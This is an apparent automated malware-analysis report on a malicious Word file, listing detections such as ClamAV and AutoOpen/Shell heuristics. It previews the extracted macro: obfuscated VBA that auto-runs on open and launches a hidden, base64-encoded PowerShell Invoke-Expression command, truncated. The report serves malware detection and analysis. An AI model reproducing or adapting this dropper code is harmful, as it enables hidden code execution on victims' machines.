MALICIOUS
242
Risk Score
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6565427-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6565427-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14128 bytes |
SHA-256: 26728390b9bb7ed2d86fbdbbea0920956999dd08f02401a8dd665c2c10c6c9d1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "UWIbRtrdWfMu" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function BhECP() On Error Resume Next XwqPS = Fix(97430 / CSng(99464) * pwtlVG * GiijKL) VhBn = CDate(82074) zdFiiH = Fix(29418 / CSng(51547) * fwdpU * uwMnjE) VhBn = CDate(27996) BhECP = zzPIMqlwTV + KKSTchjPBdw + VFBkOjPmWsC + mKLLZavlsWj + uoRZb + PRXiVf + vVvvbii + KmhCMwm + VLuBz + zlRFZkdAj hmPkYq = Fix(65702 / CSng(86776) * jEsmMU * ZZXVG) VhBn = CDate(43323) End Function Sub Autoopen() On Error Resume Next Almkiw = Fix(46844 / CSng(19446) * jzYrPW * kqmHzk) VhBn = CDate(53500) pNTOsHzwn (BhECP) iirNG = Fix(63556 / CSng(86915) * KJPwl * AuTWS) VhBn = CDate(17939) End Sub Function pNTOsHzwn(uPRHKtnCtS) On Error Resume Next ncFCin = Fix(59825 / CSng(39286) * fPKdC * HKDFq) VhBn = CDate(45850) LGKvJm = dfTfMzoGwVC + Shell(ZkmfKPG + (Chr(vbKeyP)) + aXiqs + uPRHKtnCtS + kHmpWzdO, AwAJnWj + vbHide + FAaDYZazfD) hAXFd = Fix(80950 / CSng(83352) * aSSTuC * KXtOFv) VhBn = CDate(57578) End Function Attribute VB_Name = "oHEwnITMTRZuEi" Function zzPIMqlwTV() On Error Resume Next pXbqY = Fix(31734 / CSng(12006) * QHiiCX * APdjw) VhBn = CDate(94076) VoHvjkjwsjn = "owersH" + "eLL -" + "WinDo" + "wsTyl" + "e hidden " + "-e SQBuAFYAb" + "wBrAGUA" + "LQBlAHgAcABSA" + "GUAUwBzAEkAbwB" JzbQMK = Fix(1806 / CSng(84624) * btnrVb * RjinoJ) VhBn = CDate(77808) OCaWla = "OACgAKAAoAC" + "gAIgB7A" + "DEAMwB9AHsA" + "OAA0AH" QKMAo = Fix(79158 / CSng(97019) * bwNbPI * vuYdH) VhBn = CDate(70948) PSwpAtci = "0AewAzADcAfQ" + "B7ADYAMAB9" + "AHsAO" + "QA3AH" ffZoM = Fix(5214 / CSng(38531) * CzKMz * zADoc) VhBn = CDate(7735) dhwnOiGB = "0AewA" + "0ADYA" + "fQB7ADEANQB" + "9AHsAOQAwAH" + "0AewA5ADM" + "AfQB7A" sHzLJ = Fix(55563 / CSng(67087) * QfjiCi * bzdvVS) VhBn = CDate(92434) IlXhQvB = "DEAMAB9" + "AHsAMQAxADEA" + "fQB7ADEANwB9AHs" + "AMgAwAH0AewAx" RDICz = Fix(89521 / CSng(38878) * ijCnXa * CZlQlU) VhBn = CDate(57522) iQscmufFQwS = "ADEAfQB7ADkANgB" + "9AHsAMgA0AH0" + "AewAzADgAfQB7" + "ADEAMQA0AH0Ae" zWRZDL = Fix(63451 / CSng(65882) * wtiIAa * wwqCzz) VhBn = CDate(84332) jEmHCTAjo = "wAzADMAfQB7ADEA" + "OAB9A" + "HsAOQAxAH0Ae" + "wA3ADYAfQB7ADM" + "AMgB9AHsANQA" + "xAH0AewA2A" zzPIMqlwTV = VoHvjkjwsjn + OCaWla + PSwpAtci + dhwnOiGB + IlXhQvB + iQscmufFQwS + jEmHCTAjo End Function Function KKSTchjPBdw() On Error Resume Next BXaVk = Fix(4127 / CSng(19949) * nVLfjV * czwIq) VhBn = CDate(57905) nbwqkBoH = "DUAfQB7ADkAOQB9" + "AHsAMwAwAH0AewA" + "xADQAfQB7" + "ADIAOAB9AHsA" UCzzSp = Fix(56385 / CSng(53542) * ziHYjl * zrmzv) VhBn = CDate(75226) IuCOvv = "NwAzAH" + "0AewAyADYAfQB7A" + "DYAOQB" + "9AHsANAAxA" + "H0AewA3ADQAfQ" + "B7ADcANwB" + "9AHsAMgA5AH0Aew" + "A2ADMA" + "fQB7ADM" uEdjNE = Fix(98234 / CSng(83624) * iJCYW * kVQLlO) VhBn = CDate(2047) bcMcjRD = "ANAB9AH" + "sANAA" + "3AH0AewA" + "4ADIAfQB7AD" + "EAMAAyAH0Aew" + "A3ADgAfQB7ADU" + "AMAB9AHsAMQB9AH" wjrmA = Fix(32023 / CSng(7483) * whNEuo * PXkFd) VhBn = CDate(55850) QzbiPsDsDt = "sANAAzAH0AewA1" + "ADkAfQB7" + "ADUANAB9AH" + "sAOQAyAH0AewAy" + "ADEAfQB7" + "ADcAf" dNoMH = Fix(33369 / CSng(68220) * Batjjw * RwazA) VhBn = CDate(25039) SQYmNmhDo = "QB7AD" + "gAMAB9AHsAMQAw" + "ADYAfQB" + "7ADgAfQB7AD" + "gANQB9AHs" + "AMwAxAH0AewA4" KRqvL = Fix(2271 / CSng(76380) * IXvhF * woImuM) VhBn = CDate(60606) LPUHS = "ADgAfQB7ADUAMg" + "B9AHsANQA3" + "AH0Ae" + "wA2AD" + "EAfQB7ADQAN" KKSTchjPBdw = nbwqkBoH + IuCOvv + bcMcjRD + QzbiPsDsDt + SQYmNmhDo + LPUHS End Function Function VFBkOjPmWsC() On Error Resume Next LOIMsG = Fix(74397 / CSng(59515) * cBICXW * FiwAR) VhBn = CDate(41592) wtMKfpjT = "QB9AHsAMgAyAH0A" + "ewAzAH0Aew" + "AxADAAMwB" + "9AHsANQA4AH0Aew" wrsTJR = Fix(21417 / CSng(11863) * qXGbm * IhOdsT) VhBn = CDate(61241) kiEdjlkvzz = "A2ADQAfQB7AD" + "QAOQB9AHsAMAB9A" + "HsAOQA1AH0A" + "ewA1ADYAfQB7AD" + "QANAB9AHsAMQAw" + "ADUAf ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.